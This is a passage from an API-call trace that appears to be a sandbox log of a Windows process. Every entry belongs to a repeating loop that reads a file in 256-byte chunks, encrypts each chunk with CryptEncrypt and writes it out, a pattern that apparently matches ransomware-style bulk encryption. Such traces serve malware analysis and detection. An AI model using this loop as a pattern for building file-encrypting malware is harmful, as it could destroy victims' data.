lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.671] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.671] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.671] GetLastError () returned 0x0 [0144.671] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.671] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.671] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.671] GetLastError () returned 0x0 [0144.671] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.671] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.671] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.671] GetLastError () returned 0x0 [0144.671] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.671] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.671] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.671] GetLastError () returned 0x0 [0144.671] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.671] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.671] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.671] GetLastError () returned 0x0 [0144.671] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.672] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.672] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.672] GetLastError () returned 0x0 [0144.672] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.672] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.672] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.672] GetLastError () returned 0x0 [0144.672] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.672] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.672] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.672] GetLastError () returned 0x0 [0144.672] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.672] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.672] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.672] GetLastError () returned 0x0 [0144.672] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.672] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.672] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.672] GetLastError () returned 0x0 [0144.672] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.672] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.672] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.672] GetLastError () returned 0x0 [0144.672] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.672] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.673] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.673] GetLastError () returned 0x0 [0144.673] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.673] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.673] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.673] GetLastError () returned 0x0 [0144.673] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.673] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.673] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.673] GetLastError () returned 0x0 [0144.673] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.673] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.673] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.673] GetLastError () returned 0x0 [0144.673] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.673] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.673] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.673] GetLastError () returned 0x0 [0144.673] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.673] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.673] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.673] GetLastError () returned 0x0 [0144.673] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.673] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.673] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.673] GetLastError () returned 0x0 [0144.673] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.674] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.674] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.674] GetLastError () returned 0x0 [0144.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.674] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.674] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.674] GetLastError () returned 0x0 [0144.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.674] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.674] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.674] GetLastError () returned 0x0 [0144.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.674] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.674] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.674] GetLastError () returned 0x0 [0144.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.674] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.674] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.674] GetLastError () returned 0x0 [0144.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.674] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.674] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.674] GetLastError () returned 0x0 [0144.674] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.674] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.675] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.675] GetLastError () returned 0x0 [0144.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.675] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.675] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.675] GetLastError () returned 0x0 [0144.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.675] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.675] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.675] GetLastError () returned 0x0 [0144.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.675] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.675] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.675] GetLastError () returned 0x0 [0144.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.675] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.675] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.675] GetLastError () returned 0x0 [0144.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.675] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.675] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.675] GetLastError () returned 0x0 [0144.675] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.675] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.675] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.676] GetLastError () returned 0x0 [0144.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.676] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.676] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.676] GetLastError () returned 0x0 [0144.676] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.676] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, 